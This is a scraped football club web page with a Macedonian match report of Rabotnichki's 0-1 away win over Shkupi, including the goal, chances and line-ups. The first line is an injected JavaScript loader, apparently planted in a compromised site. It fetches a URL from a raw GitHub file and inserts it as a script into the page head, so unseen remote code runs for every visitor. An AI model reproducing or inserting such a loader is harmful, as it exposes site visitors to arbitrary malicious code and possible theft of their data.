;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Чаирска романтика
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Чаирска романтика

Екипата на Работнички по две одиграни кола се наоѓа на првото место во Првата лига откако „романтичарите“ забележаа нова гостинска победа, овојпат на жешкиот терен на стадионот „Чаир“ со минимални 0-1.

Нашиот тим покажа и квалитет и карактер, па на крајот заслужено стигна до голем триумф со кој покажа дека и сезонава е подготвен да се бори за висок пласман. Мечот го почнавме одлично, со шанси на Ивановски и на Елмаз, по што Шкупи првпат се закани со слободниот удар на Лазаревски, кој не заврши во нашата мрежа.

Како клучен момент на натпреварот се покажа 24. Минута, кога Сахити изведе скратен корнер, а на работ од петерецот највисоко скокна Леон Најдовска, сместувајќи ја топката во мрежата на Зендели. Домаќините тргнаа во офанзива да постигнат израмнувачки гол, Бајрами шутираше со левата нога, за малку непрецизно, додека Шишковски одлично го одбрани обидот со глава на Демири.

skupi rabotnicki slavi

Слична слика можеше да се проследи и во второто полувреме, во кое домаќините тргнаа да постигнат израмнувачки гол, но одбраната на Работнички функционираше беспрекорно. Бајрами во 75. Минута се обиде од слободен удар од триесетина метри откосо да го изненади Шишковски, но нашиот голман беше внимателен и ја исфрли топката во корнер.

Најубавата шанса во вториот дел ја имаше Работнички, Филип Ивановски се најде во идеална позиција, но Зендели малку ја допре топката, по што еден домашен дефанзивец ја запре на патот до мрежата во самата завршница.

Севкупно гледано, одлична игра и заслужена победа на избраниците на Виктор Треневски, кои заедно со Пелистер се двете екипи со максимални шест бода по првите две кола.

ШКУПИ – РАБОТНИЧКИ   0-1 (0-1)

Стадион: Чаир. Гледачи: 1.000. Судија: Марјан Ецкоски (Охрид). Стрелец: Леон Најдовски 24′

ШКУПИ: Зендели, Османи, Асани, Лазаревски, Бериша, Бајрами, Кадриу, Јаневски, Адили, Исени, Демири.

РАБОТНИЧКИ: Шишковски, Силјановски, Најдовски, Митрев, Наумчевски, Трајчевски, Најденов, Сахити, Елмас, Маркоски, Ивановски.

Leave a Reply